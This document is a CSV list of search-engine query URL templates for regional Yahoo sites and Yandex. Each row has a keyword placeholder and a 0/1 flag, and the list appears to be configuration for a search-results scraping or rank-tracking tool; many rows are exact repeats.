"International","Yahoo KR 3 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=31","1"
"International","Yahoo KR 3 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo KR 3 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo KR 3 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo KR 3 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo KR 3 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=31","0"
"International","Yahoo KR 4 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=46","1"
"International","Yahoo KR 4 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=46","0"
"International","Yahoo KR 4 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=46","0"
"International","Yahoo KR 4 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=46","0"
"International","Yahoo KR 4 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=46","0"
"International","Yahoo KR 4 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=46","0"
"International","Yahoo KR 5 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=61","1"
"International","Yahoo KR 5 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=61","0"
"International","Yahoo KR 5 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=61","0"
"International","Yahoo KR 5 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=61","0"
"International","Yahoo KR 5 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=61","0"
"International","Yahoo KR 5 (Next 15)","http://kr.search.yahoo.com/search/web?p={SEARCH_KEYWORD}&b=61","0"
"International","Yahoo MX","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&meta=fl%3D1%26vl%3Dlang_es&fr=fp-tab-web-t&cop=mss&tab=","1"
"International","Yahoo MX","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&meta=fl%3D1%26vl%3Dlang_es&fr=fp-tab-web-t&cop=mss&tab=","0"
"International","Yahoo MX","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&meta=fl%3D1%26vl%3Dlang_es&fr=fp-tab-web-t&cop=mss&tab=","0"
"International","Yahoo MX","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&meta=fl%3D1%26vl%3Dlang_es&fr=fp-tab-web-t&cop=mss&tab=","0"
"International","Yahoo MX","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&meta=fl%3D1%26vl%3Dlang_es&fr=fp-tab-web-t&cop=mss&tab=","0"
"International","Yahoo MX","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&meta=fl%3D1%26vl%3Dlang_es&fr=fp-tab-web-t&cop=mss&tab=","0"
"International","Yahoo MX 2 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=101","1"
"International","Yahoo MX 2 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=101","0"
"International","Yahoo MX 2 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=101","0"
"International","Yahoo MX 2 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=101","0"
"International","Yahoo MX 2 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=101","0"
"International","Yahoo MX 2 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=101","0"
"International","Yahoo MX 3 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=201","1"
"International","Yahoo MX 3 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=201","0"
"International","Yahoo MX 3 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=201","0"
"International","Yahoo MX 3 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=201","0"
"International","Yahoo MX 3 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=201","0"
"International","Yahoo MX 3 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=201","0"
"International","Yahoo MX 4 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=301","1"
"International","Yahoo MX 4 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=301","0"
"International","Yahoo MX 4 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=301","0"
"International","Yahoo MX 4 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=301","0"
"International","Yahoo MX 4 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=301","0"
"International","Yahoo MX 4 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=301","0"
"International","Yahoo MX 5 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=401","1"
"International","Yahoo MX 5 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=401","0"
"International","Yahoo MX 5 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=401","0"
"International","Yahoo MX 5 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=401","1"
"International","Yahoo MX 5 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=401","0"
"International","Yahoo MX 5 (Next 100)","http://mx.search.yahoo.com/search/mx?p={SEARCH_KEYWORD}&cop=mss&fl=1&vl=lang_es&xargs=&fr=fp-tab-web-t&b=401","0"
"International","Yahoo NO","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y","1"
"International","Yahoo NO","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo NO","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo NO","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo NO","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo NO","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo NO 2 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=21&h=W&page=2","1"
"International","Yahoo NO 2 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=21&h=W&page=2","0"
"International","Yahoo NO 2 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=21&h=W&page=2","0"
"International","Yahoo NO 2 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=21&h=W&page=2","0"
"International","Yahoo NO 2 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=21&h=W&page=2","0"
"International","Yahoo NO 2 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=21&h=W&page=2","0"
"International","Yahoo NO 3 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=41&h=W&page=3","1"
"International","Yahoo NO 3 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=41&h=W&page=3","0"
"International","Yahoo NO 3 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=41&h=W&page=3","0"
"International","Yahoo NO 3 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=41&h=W&page=3","0"
"International","Yahoo NO 3 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=41&h=W&page=3","1"
"International","Yahoo NO 3 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=41&h=W&page=3","0"
"International","Yahoo NO 4 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=61&h=W&page=4","1"
"International","Yahoo NO 4 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=61&h=W&page=4","0"
"International","Yahoo NO 4 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=61&h=W&page=4","0"
"International","Yahoo NO 4 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=61&h=W&page=4","0"
"International","Yahoo NO 4 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=61&h=W&page=4","0"
"International","Yahoo NO 4 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=61&h=W&page=4","0"
"International","Yahoo NO 5 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=81&h=W&page=5","1"
"International","Yahoo NO 5 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=81&h=W&page=5","0"
"International","Yahoo NO 5 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=81&h=W&page=5","0"
"International","Yahoo NO 5 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=81&h=W&page=5","0"
"International","Yahoo NO 5 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=81&h=W&page=5","0"
"International","Yahoo NO 5 (Next 20)","http://no.search.yahoo.com/search/no?p={SEARCH_KEYWORD}&y=y&hc=6&hs=103000&b=81&h=W&page=5","0"
"International","Yahoo NZ","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","1"
"International","Yahoo NZ","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo NZ","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo NZ","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo NZ","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo NZ","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}","0"
"International","Yahoo NZ 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=24&hs=1&xargs=0","1"
"International","Yahoo NZ 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=24&hs=1&xargs=0","0"
"International","Yahoo NZ 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=24&hs=1&xargs=0","0"
"International","Yahoo NZ 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=24&hs=1&xargs=0","0"
"International","Yahoo NZ 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=24&hs=1&xargs=0","0"
"International","Yahoo NZ 2 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=21&hc=24&hs=1&xargs=0","0"
"International","Yahoo NZ 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","1"
"International","Yahoo NZ 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 3 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=41&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","1"
"International","Yahoo NZ 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo NZ 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo NZ 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo NZ 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo NZ 4 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=61&hc=&hs=1&xargs=0","0"
"International","Yahoo NZ 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","1"
"International","Yahoo NZ 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo NZ 5 (Next 20)","http://classic.search.yahoo.com/search?p={SEARCH_KEYWORD}&b=81&hc=&hs=1&xargs=","0"
"International","Yahoo SE","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y","1"
"International","Yahoo SE","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo SE","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo SE","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo SE","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo SE","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y","0"
"International","Yahoo SE 2 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=21&h=W&page=2","1"
"International","Yahoo SE 2 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=21&h=W&page=2","0"
"International","Yahoo SE 2 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=21&h=W&page=2","0"
"International","Yahoo SE 2 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=21&h=W&page=2","0"
"International","Yahoo SE 2 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=21&h=W&page=2","0"
"International","Yahoo SE 2 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=21&h=W&page=2","0"
"International","Yahoo SE 3 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=41&h=W&page=3","1"
"International","Yahoo SE 3 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=41&h=W&page=3","0"
"International","Yahoo SE 3 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=41&h=W&page=3","0"
"International","Yahoo SE 3 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=41&h=W&page=3","0"
"International","Yahoo SE 3 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=41&h=W&page=3","0"
"International","Yahoo SE 3 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=41&h=W&page=3","0"
"International","Yahoo SE 4 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=61&h=W&page=4","1"
"International","Yahoo SE 4 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=61&h=W&page=4","0"
"International","Yahoo SE 4 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=61&h=W&page=4","0"
"International","Yahoo SE 4 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=61&h=W&page=4","0"
"International","Yahoo SE 4 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=61&h=W&page=4","0"
"International","Yahoo SE 4 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=61&h=W&page=4","0"
"International","Yahoo SE 5 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=81&h=W&page=5","1"
"International","Yahoo SE 5 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=81&h=W&page=5","0"
"International","Yahoo SE 5 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=81&h=W&page=5","0"
"International","Yahoo SE 5 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=81&h=W&page=5","0"
"International","Yahoo SE 5 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=81&h=W&page=5","0"
"International","Yahoo SE 5 (Next 20)","http://se.search.yahoo.com/search/se?p={SEARCH_KEYWORD}&y=y&hc=3&hs=248000&b=81&h=W&page=5","0"
"International","Yahoo TW","http://tw.websearch.yahoo.com/search/web_kimo?p={SEARCH_KEYWORD}&u=b&hc=0&hs=0","1"
"International","Yahoo TW","http://tw.websearch.yahoo.com/search/web_kimo?p={SEARCH_KEYWORD}&u=b&hc=0&hs=0","0"
"International","Yahoo TW","http://tw.websearch.yahoo.com/search/web_kimo?p={SEARCH_KEYWORD}&u=b&hc=0&hs=0","0"
"International","Yahoo TW","http://tw.websearch.yahoo.com/search/web_kimo?p={SEARCH_KEYWORD}&u=b&hc=0&hs=0","0"
"International","Yahoo TW","http://tw.websearch.yahoo.com/search/web_kimo?p={SEARCH_KEYWORD}&u=b&hc=0&hs=0","0"
"International","Yahoo TW","http://tw.websearch.yahoo.com/search/web_kimo?p={SEARCH_KEYWORD}&u=b&hc=0&hs=0","0"
"International","Yahoo TW 2 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=11","1"
"International","Yahoo TW 2 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=11","0"
"International","Yahoo TW 2 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=11","0"
"International","Yahoo TW 2 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=11","0"
"International","Yahoo TW 2 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=11","0"
"International","Yahoo TW 2 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=2&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=11","0"
"International","Yahoo TW 3 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=21","1"
"International","Yahoo TW 3 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=21","0"
"International","Yahoo TW 3 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=21","0"
"International","Yahoo TW 3 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=21","0"
"International","Yahoo TW 3 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=21","0"
"International","Yahoo TW 3 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=3&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=21","0"
"International","Yahoo TW 4 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=31","1"
"International","Yahoo TW 4 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=31","0"
"International","Yahoo TW 4 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=31","0"
"International","Yahoo TW 4 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=31","0"
"International","Yahoo TW 4 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=31","0"
"International","Yahoo TW 4 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=4&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=31","0"
"International","Yahoo TW 5 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=41","1"
"International","Yahoo TW 5 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=41","0"
"International","Yahoo TW 5 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=41","0"
"International","Yahoo TW 5 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=41","0"
"International","Yahoo TW 5 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=41","0"
"International","Yahoo TW 5 (Next 10)","http://tw.websearch.yahoo.com/search/web_kimo?o_p=5&p={SEARCH_KEYWORD}&o_m=1000&o_l=0&b=41","0"
"International","Yahoo! IT","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y","1"
"International","Yahoo! IT 2 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=21&h=W&page=2","1"
"International","Yahoo! IT 3 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=21&h=W&page=3","1"
"International","Yahoo! IT 4 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=21&h=W&page=4","1"
"International","Yahoo! IT 5 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=21&h=W&page=5","1"
"International","Yahoo! IT 6 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=21&h=W&page=6","1"
"International","Yahoo! IT 7 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=21&h=W&page=7","1"
"International","Yahoo! IT 8 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=41&h=W&page=8","1"
"International","Yahoo! IT 9 (Next 20)","http://it.search.yahoo.com/search/it?p={SEARCH_KEYWORD}&y=y&hc=0&hs=1460&b=41&h=W&page=9","1"
"International","Yahoo2 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=101","1"
"International","Yahoo3 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=201","1"
"International","Yahoo4 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=301","1"
"International","Yahoo5 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=401","1"
"International","Yahoo6 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=501","1"
"International","Yahoo7 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=601","1"
"International","Yahoo8 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=701","1"
"International","Yahoo9 (Next 100)","http://search.yahoo.com/search?va={SEARCH_KEYWORD}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=801","1"
"International","Yandex","http://www.yandex.ru/yandsearch?text={SEARCH_KEYWORD}","1"
"International","Yandex 2 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=1&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
"International","Yandex 3 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=1&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
"International","Yandex 4 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=1&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
"International","Yandex 5 (Next 10)","http://www.yandex.ru/yandpage?q=375914754&p=1&ag=h&qs=text%3D{SEARCH_KEYWORD}","1"
